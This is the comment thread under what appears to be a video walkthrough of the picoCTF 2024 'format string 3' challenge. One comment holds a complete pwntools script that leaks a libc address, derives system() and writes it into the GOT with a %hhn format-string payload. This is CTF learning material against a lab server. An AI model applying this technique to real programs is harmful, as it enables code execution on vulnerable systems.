pico2024 format string 3



  • @User-f7w9e
    @User-f7w9e Місяць тому

    Any documents??

  • @User-f7w9e
    @User-f7w9e Місяць тому

    Which place do you learn , because i know lit bit of English 😢

    • @carlislemc
      @carlislemc  27 днів тому

      Mostly by reading writeups at CTF time

  • @Collins-g3u
    @Collins-g3u 27 днів тому +1

    next time please take it slowly step by step cause it's hard understanding you

  • @KeptYouWaitingHah
    @KeptYouWaitingHah 4 місяці тому +1


    • @carlislemc
      @carlislemc  4 місяці тому

      you're welcome! Glad you liked it.

  • @robertdreyfus5436
    @robertdreyfus5436 4 місяці тому

    Nice vid. The %03d padding for the payload was neat. Given that setvbuf and system are 0x2ac90 distant in the libc Ghidra listing, why not take that number from the given setvbuf address to get the system address? Don't think the printf buffer is character limited. Was nice to see the Makefile too at pwn.
    from pwn import *
    io = remote('rhea.picoctf.net', 54882)
    context.log_level = 'debug'
    print(io.recvuntil('in libc: '))
    setvbuf_addr = io.recvuntil('
    ', drop=True)
    system_addr = hex(int(setvbuf_addr[2:],16)-0x2ac90)[2:] # first [2:] removes the '0x' by converting a bytes object to a string object for manipulation, nice!
    byte3 = int(system_addr[6:8],16) # decimal values for %hhn character count
    byte2 = int(system_addr[8:10],16)
    byte1 = int(system_addr[10:12],16) # always 96 (0x60) so no calculation required
    filler1 = (byte2 - byte1)%256 - 4 # -4 accounts for ,ZZ, characters in payload
    filler2 = (byte3 - byte2)%256 - 4
    payload = ''
    payload += '%92cZZZ,%44$hhn,' # 92 characters plus ZZZ, gives 96
    payload += '%' + '%03d'%filler1 + 'cZZ,' + '%45$hhn,'
    payload += '%' + '%03d'%filler2 + 'cZZ,' + '%46$hhn,'
    payload += '\x18\x40\x40\x00\x00\x00\x00\x00\x19\x40\x40\x00\x00\x00\x00\x00\x1a\x40\x40\x00\x00\x00\x00\x00'

    • @carlislemc
      @carlislemc  4 місяці тому

      Doing that subtraction is a better idea than what I did.

    • @robertdreyfus5436
      @robertdreyfus5436 4 місяці тому +1

      @@carlislemc The pico challenges have been interesting this year and your videos have been brilliant. The single byte %hhn approach is powerful, because even with a negative difference between bytes, the mod arithmetic takes care of it.

    • @carlislemc
      @carlislemc  4 місяці тому

      ​@@robertdreyfus5436thanks for the kind words

    • @k1llv01d
      @k1llv01d Місяць тому

      thanks for your script man, more easy to understand!